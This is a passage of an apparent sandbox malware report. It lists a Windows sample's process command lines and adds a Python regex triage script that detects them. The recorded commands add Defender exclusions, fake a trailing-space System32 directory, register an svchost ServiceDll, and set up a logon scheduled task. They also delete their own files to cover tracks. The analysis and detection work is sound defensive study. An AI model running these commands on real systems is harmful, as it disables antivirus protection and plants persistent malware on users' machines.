Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 15
Start time: 06:41:29
Start date: 18/12/2024
Path: C:\Windows\System32\timeout.exe
Wow64 process (32bit): false
Commandline: timeout /t 10 /nobreak
Imagebase: 0x7ff790ae0000
File size: 32'768 bytes
MD5 hash: 100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 16
Start time: 06:41:29
Start date: 18/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Imagebase: 0x7ff7d3130000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 17
Start time: 06:41:29
Start date: 18/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 18
Start time: 06:41:29
Start date: 18/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 19
Start time: 06:41:30
Start date: 18/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase: 0x7ff7403e0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 20
Start time: 06:41:33
Start date: 18/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Imagebase: 0x7ff7d3130000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 21
Start time: 06:41:33
Start date: 18/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 22
Start time: 06:41:33
Start date: 18/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 23
Start time: 06:41:36
Start date: 18/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd.exe /c mkdir "\\?\C:\Windows \System32"
Imagebase: 0x7ff7d3130000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 06:41:36
Start date: 18/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 25
Start time: 06:41:36
Start date: 18/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd.exe /c start "" "C:\Windows \System32\printui.exe"
Imagebase: 0x7ff7d3130000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 26
Start time: 06:41:36
Start date: 18/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 06:41:36
Start date: 18/12/2024
Path: C:\Windows \System32\printui.exe
Wow64 process (32bit): false
Commandline: "C:\Windows \System32\printui.exe"
Imagebase: 0x7ff63f420000
File size: 64'000 bytes
MD5 hash: 2FC3530F3E05667F8240FC77F7486E7E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited: true

Target ID: 28
Start time: 06:41:37
Start date: 18/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe"
Imagebase: 0x7ff7d3130000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 29
Start time: 06:41:37
Start date: 18/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Imagebase: 0x7ff7d3130000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 30
Start time: 06:41:37
Start date: 18/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 31
Start time: 06:41:37
Start date: 18/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 32
Start time: 06:41:37
Start date: 18/12/2024
Path: C:\Windows\System32\timeout.exe
Wow64 process (32bit): false
Commandline: timeout /t 10 /nobreak
Imagebase: 0x7ff790ae0000
File size: 32'768 bytes
MD5 hash: 100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 33
Start time: 06:41:37
Start date: 18/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 37
Start time: 06:41:44
Start date: 18/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
                                                                                          Commandline:cmd.exe /c sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f && sc start x816796
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:38
                                                                                          Start time:06:41:44
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:39
                                                                                          Start time:06:41:44
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
                                                                                          Imagebase:0x7ff64c730000
                                                                                          File size:72'192 bytes
                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:40
                                                                                          Start time:06:41:44
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\reg.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f
                                                                                          Imagebase:0x7ff7833c0000
                                                                                          File size:77'312 bytes
                                                                                          MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:41
                                                                                          Start time:06:41:44
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:sc start x816796
                                                                                          Imagebase:0x7ff64c730000
                                                                                          File size:72'192 bytes
                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:42
                                                                                          Start time:06:41:44
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\System32\svchost.exe -k DcomLaunch
                                                                                          Imagebase:0x7ff7403e0000
                                                                                          File size:55'320 bytes
                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:false

                                                                                          Target ID:43
                                                                                          Start time:06:41:45
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:44
                                                                                          Start time:06:41:45
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:45
                                                                                          Start time:06:41:45
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\console_zero.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\console_zero.exe"
                                                                                          Imagebase:0x7ff71fa00000
                                                                                          File size:477'696 bytes
                                                                                          MD5 hash:74CF33F8C2FCB56F749AAF411B9AE302
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Antivirus matches:
                                                                                          • Detection: 100%, Avira
                                                                                          • Detection: 71%, ReversingLabs
                                                                                          Has exited:true

                                                                                          Target ID:46
                                                                                          Start time:06:41:45
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c schtasks /delete /tn "console_zero" /f
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:47
                                                                                          Start time:06:41:45
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:48
                                                                                          Start time:06:41:45
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:schtasks /delete /tn "console_zero" /f
                                                                                          Imagebase:0x7ff78f510000
                                                                                          File size:235'008 bytes
                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:49
                                                                                          Start time:06:41:45
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:50
                                                                                          Start time:06:41:45
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:51
                                                                                          Start time:06:41:46
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
                                                                                          Imagebase:0x7ff6e3d50000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:52
                                                                                          Start time:06:41:46
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:53
                                                                                          Start time:06:41:46
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:54
                                                                                          Start time:06:41:46
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\timeout.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:timeout /t 10 /nobreak
                                                                                          Imagebase:0x7ff790ae0000
                                                                                          File size:32'768 bytes
                                                                                          MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:55
                                                                                          Start time:06:41:46
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true
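
Read together, target IDs 33 through 55 above are one chain typed through cmd.exe: a Defender exclusion for both the real System32 and a look-alike "C:\Windows \System32" (directory name with a trailing space, the same directory the later rmdir removes), an svchost-hosted service x816796 whose ServiceDll is a .dat file in System32, a console_zero scheduled task at logon with /rl HIGHEST, and a delayed cleanup. The Python below is an added triage example, not part of the Joe Sandbox report or of the analysed sample: it re-types those command lines as constructed test input and runs a few regex rules over them, returning one tag per behaviour. The tag names and the rule set are my own; they cover exactly the patterns visible in this process list and would need widening for other tooling.

```python
import re
from typing import List, Optional

# Constructed test input: the command lines recorded for target IDs 33, 37, 43, 46, 49,
# 52 and 55 in the process list above, re-typed here so the rules run offline.
SAMPLE_CMDLINES = [
    r'''powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; '''
    r'''Add-MpPreference -ExclusionPath 'C:\Windows\System32';"''',
    r'cmd.exe /c sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" '
    r'type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters '
    r'/v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f && sc start x816796',
    r'cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"',
    r'cmd.exe /c schtasks /delete /tn "console_zero" /f',
    r"cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'",
    r'cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"',
    r'cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON '
    r'/tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f',
]

# A drive-letter path up to the next quote; spaces are allowed because quoted paths contain them.
WIN_PATH = re.compile(r"[A-Za-z]:\\[^\"']*")
# Add-/Set-MpPreference with any -Exclusion* switch; captures the excluded value.
DEFENDER_EXCLUSION = re.compile(
    r"(?:Add|Set)-MpPreference\s+-Exclusion(?:Path|Process|Extension)\s+['\"]?([^'\";]+)", re.I)
# sc create <name> binPath= "...svchost.exe -k <group>": a service that will load a ServiceDll.
SVCHOST_SERVICE = re.compile(
    r"\bsc(?:\.exe)?\s+create\s+(\S+)\s.*?binPath=\s*\"?[^\"]*?svchost\.exe\s+-k\s+([^\"\s]+)", re.I)
# reg add ...\services\<name>\Parameters /v ServiceDll ... /d <path>
SERVICE_DLL = re.compile(
    r"\breg(?:\.exe)?\s+add\s+\S*\\services\\([^\\\s]+)\\Parameters\b.*?/v\s+ServiceDll\b"
    r".*?/d\s+\"?([^\"\s]+)", re.I)
SCHTASK_CREATE = re.compile(r"\bschtasks(?:\.exe)?\s+/create\b(.*)", re.I)
# timeout ... && rmdir/del: wait for the parent to exit, then remove the evidence.
SELF_DELETE = re.compile(r"\btimeout\b.*&&.*\b(?:rmdir|rd|del|erase)\b", re.I)


def _opt(args: str, name: str) -> Optional[str]:
    """Value of a schtasks-style /name option, with surrounding quotes removed."""
    m = re.search(r"/%s\s+(\"[^\"]*\"|\S+)" % name, args, re.I)
    return m.group(1).strip('"') if m else None


def mock_trusted_dirs(cmdline: str) -> List[str]:
    r"""Directories whose name ends in a space (C:\Windows \ in the report above).

    NTFS treats that as a directory distinct from C:\Windows, which is what makes a
    look-alike System32 work; a space inside a name (Program Files) is not flagged."""
    hits: List[str] = []
    for path in WIN_PATH.findall(cmdline):
        parts = path.split("\\")
        for i, part in enumerate(parts[:-1]):
            if part.endswith(" "):
                hit = "\\".join(parts[: i + 1]) + "\\"
                if hit not in hits:
                    hits.append(hit)
    return hits


def triage(cmdline: str) -> List[str]:
    """Map one process command line to behaviour tags (names are this example's own)."""
    findings: List[str] = []
    for excl in DEFENDER_EXCLUSION.findall(cmdline):
        findings.append("defender_exclusion:" + excl.strip())
    m = SVCHOST_SERVICE.search(cmdline)
    if m:
        findings.append(f"svchost_service:{m.group(1)}:{m.group(2)}")
    m = SERVICE_DLL.search(cmdline)
    if m:
        name, dll = m.group(1), m.group(2)
        # svchost loads a ServiceDll regardless of extension; a .dat name only hides it
        # from a sweep that looks for new *.dll files in System32.
        tag = "service_dll" if dll.lower().endswith(".dll") else "service_dll_nondll"
        findings.append(f"{tag}:{name}:{dll}")
    m = SCHTASK_CREATE.search(cmdline)
    if m:
        tn, sc, tr, rl = (_opt(m.group(1), n) for n in ("tn", "sc", "tr", "rl"))
        if (sc or "").upper() == "ONLOGON" and (rl or "").upper() == "HIGHEST":
            findings.append(f"logon_task_highest:{tn}:{tr}")
    if SELF_DELETE.search(cmdline):
        findings.append("delayed_cleanup")
    for d in mock_trusted_dirs(cmdline):
        findings.append("mock_trusted_dir:" + d)
    return findings


def triage_all(cmdlines: List[str]) -> List[List[str]]:
    """Run triage over a whole process list, preserving order."""
    return [triage(c) for c in cmdlines]


if __name__ == "__main__":
    for cmd, found in zip(SAMPLE_CMDLINES, triage_all(SAMPLE_CMDLINES)):
        print(found or ["-"], "<-", cmd[:70])
```

The ServiceDll rule reports the registered path rather than just a yes/no so that the non-.dll extension is visible in the output; the trailing-space check works on path components instead of a substring match so that ordinary names containing spaces do not trip it. Neither rule replaces the Sigma hits the report already lists; they are a way to re-derive them from a process log when the sandbox is not available.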

                                                                                          Target ID:56
                                                                                          Start time:06:41:46
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:57
                                                                                          Start time:06:41:46
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                          Imagebase:0x7ff78f510000
                                                                                          File size:235'008 bytes
                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:58
                                                                                          Start time:06:41:47
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\console_zero.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\System32\console_zero.exe
                                                                                          Imagebase:0x7ff71fa00000
                                                                                          File size:477'696 bytes
                                                                                          MD5 hash:74CF33F8C2FCB56F749AAF411B9AE302
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:59
                                                                                          Start time:06:41:48
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c schtasks /delete /tn "console_zero" /f
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:60
                                                                                          Start time:06:41:48
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7403e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:61
                                                                                          Start time:06:41:48
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:schtasks /delete /tn "console_zero" /f
                                                                                          Imagebase:0x7ff78f510000
                                                                                          File size:235'008 bytes
                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:62
                                                                                          Start time:06:41:49
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:63
                                                                                          Start time:06:41:49
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:64
                                                                                          Start time:06:41:49
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:powershell -Command Add-MpPreference -ExclusionPath 'E:\'
                                                                                          Imagebase:0xa30000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:65
                                                                                          Start time:06:41:49
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

